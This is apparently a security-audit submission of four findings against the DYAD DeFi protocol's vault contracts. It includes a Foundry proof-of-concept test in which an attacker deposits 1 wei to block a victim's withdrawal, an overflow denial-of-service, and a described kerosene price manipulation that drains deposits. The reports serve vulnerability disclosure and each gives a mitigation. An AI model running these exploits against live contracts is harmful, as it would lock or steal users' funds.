DYAD - Ryonen's results

Lines of code

https://github.com/code-423n4/2024-04-dyad/blob/main/src/core/VaultManagerV2.sol#L125 https://github.com/code-423n4/2024-04-dyad/blob/main/src/core/VaultManagerV2.sol#L143

Vulnerability details

Impact

It is possible to execute a front-run attack on all users attempting to withdraw their collateral from VaultManagerV2. The vulnerable functions are VaultManagerV2.withdraw and VaultManagerV2.redeemDyad. This vulnerability arises because the attacker can deposit an arbitrary amount (for example, 1 wei) of the corresponding vault asset.

Proof of Concept

  function testFrontrunDos() external {

    //******CONSTANTS CONFIGURATION*******//

    address wethWhale = address(new UserNftReceiver());
    address attacker = address(new UserNftReceiver());

    address weth = MAINNET_WETH;
    VaultManagerV2 vaultManagerV2 = contracts.vaultManager;
    Vault ethVault = contracts.ethVault;

    vm.deal(wethWhale, 200 ether);
    vm.deal(attacker, 200 ether);

    deal(address(weth), wethWhale, 200 ether);
    deal(address(weth), attacker, 200 ether);

    DNft dNft = contracts.vaultManager.dNft();
    uint256 AMOUNT_TO_DEPOSIT = 100 ether;

    uint256 nftId = dNft.totalSupply();
    uint256 NFT_COST = dNft.START_PRICE() + (dNft.PRICE_INCREASE() * dNft.publicMints());

    //******WHALE INITIAL DEPOSIT*******//

    vm.startPrank(wethWhale);

    dNft.mintNft{value: NFT_COST}(wethWhale);
    vaultManagerV2.add(nftId, address(ethVault));
    IWETH(weth).approve(address(vaultManagerV2), AMOUNT_TO_DEPOSIT);
    vaultManagerV2.deposit(nftId, address(ethVault), AMOUNT_TO_DEPOSIT);

    vm.stopPrank();

    //******ATTACKER FRONTRUNNING*******//

    vm.roll(block.number + 1);

    vm.startPrank(attacker);

    IWETH(weth).approve(address(vaultManagerV2), 1);
    vaultManagerV2.deposit(nftId, address(ethVault), 1);

    vm.stopPrank();

    vm.startPrank(wethWhale);

    vm.expectRevert();
    vaultManagerV2.withdraw(nftId, address(ethVault), AMOUNT_TO_DEPOSIT, wethWhale);

    vm.stopPrank();


  }
}

interface IWETH {
  function approve(address, uint256) external returns (bool);
  function allowance(address, address) external returns (uint256);
}


contract UserNftReceiver {

   function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4){
      return this.onERC721Received.selector;
    }
  receive() external payable{

  }
}

Tools Used

Foundry

Recommended Mitigation Steps

If you intend to maintain the restriction of executing calls in the same block, you should verify that the user initiating the deposit call is also the owner of the NFT.

Assessed type

DoS

Lines of code

https://github.com/code-423n4/2024-04-dyad/blob/main/src/core/Vault.kerosine.unbounded.sol#L65

Vulnerability details

Impact

As a consequence of a large number of dyads being minted in the old version, an overflow error occurs when calculating the price of kerosene in VaultManagerV2. Consequently, important functions like liquidate() cannot be called properly until a significant proportion of collateral is provided in the new version.

Proof of Concept

This test runs in ethereum mainnet.

Reemplace Vault.kerosine.unbounded.sol::assetPrice con:

      console.log("tvl");
      console.log(tvl);
      console.log("dyad.totalSupply()");
      console.log(dyad.totalSupply());
      uint numerator   = tvl - dyad.totalSupply(); // THIS LINE REVERTS
      uint denominator = kerosineDenominator.denominator();

  function testDOSDueToOverflow() external {

    
    UnboundedKerosineVault unboundedKerosineVault = contracts.unboundedKerosineVault;

    vm.expectRevert();
    unboundedKerosineVault.assetPrice();

  }

Logs:

  tvl
  0
  dyad.totalSupply()
  622967400000000000000000

Tools Used

Foundry

Recommended Mitigation Steps

It might be advisable to create a new version of dyad to avoid these issues after forking to the new version. Additionally, the deployment script should be adapted accordingly.

Assessed type

MEV

Lines of code

https://github.com/code-423n4/2024-04-dyad/blob/main/src/core/VaultManagerV2.sol#L26

Vulnerability details

Impact

Ethereum mainnet currently has an average transaction cost of approximately $10,considering that the REWARD RATE is 20%, positions with less than 150 USD in collateral are not profitable to liquidate. This threshold could increase rapidly as transaction costs on Ethereum rise.

Tools Used

Manual review

Recommended Mitigation Steps

Due to the computational complexity of the liquidate function, which increases transaction gas costs, and the fact that funds cannot be withdrawn by the user, adding an option for donations that uses fewer opcodes would be a good choice. However, it is essential to consider potential future vulnerabilities that such a function may introduce regarding health factor concerns.

Assessed type

Other

Lines of code

https://github.com/code-423n4/2024-04-dyad/blob/main/src/core/Vault.kerosine.unbounded.sol#L50-L68

Vulnerability details

Impact

Liquidatable positions, including those with a collateral ratio < 1 and using kerosene as collateral, can be exploited to profit and drain the protocol's deposits.

Proof of Concept

It can be profitable by manipulating the price of kerosene upwards. For this, it would be necessary to already have minted dyad in advance to burn it, thus increasing the price of kerosene and making positions closer to a 1.5 collateral ratio more profitable.The larger the amount of dyad burned, the more value it is possible to steal from the protocol

Tools Used

Manual Review

Recommended Mitigation Steps

Implement UniswapTWAP

Assessed type

MEV